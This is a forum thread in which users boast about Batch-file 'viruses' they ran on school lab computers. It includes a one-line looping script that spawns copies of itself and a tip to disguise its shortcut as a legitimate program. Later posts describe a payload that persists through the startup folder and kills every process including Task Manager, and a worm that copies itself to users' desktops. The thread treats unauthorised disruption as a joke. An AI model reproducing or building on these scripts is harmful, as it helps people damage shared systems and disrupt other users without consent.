I accidentally set off one of my viruses on a school computer. It is really harmless. These are the lines of code (written in Batch)
:A ping (some ip) start C:\system32\(filename).bat goto A
Make a shortcut on the desktop disguised as something else. You can change the icon to that program.

@Ryan_Vickers lol

@dexxterlab97 looks obvious enough for me
-
@Railgun To really surprise someone, I would have it open the actual program, wait 5 seconds, and then wreak havok
-
@Railgun But it would need two batch files to do so. Not much more complex though

I had a few fun ones back in the day... one would sit dormant until I time I specified and then would use the PC speaker (you know the old school one with no volume control that could only play one tone at a time?) to make alarm sounds... it was fun to go around starting it on all the computers in the lab and just wait for that moment...

One was far more ... effective, though. I never unleashed it on someone because it would have actually caused problems. When you launched it, it would copy itself to the startup folder so it would always auto-run on future logins. While running, it would constantly kill all running programs, so you'd be left with a blank desktop, no task bar, and even task manager would be useless since it would be instantly closed

I didn't know that you could be more evil. Last year I wrote an enormous one that could wreak some real havoc. It automatically put it in the desktop of every person that had logged onto that computer when opened. The thing itself was a worm, but it was deleted when they wiped the servers (like they do every year)
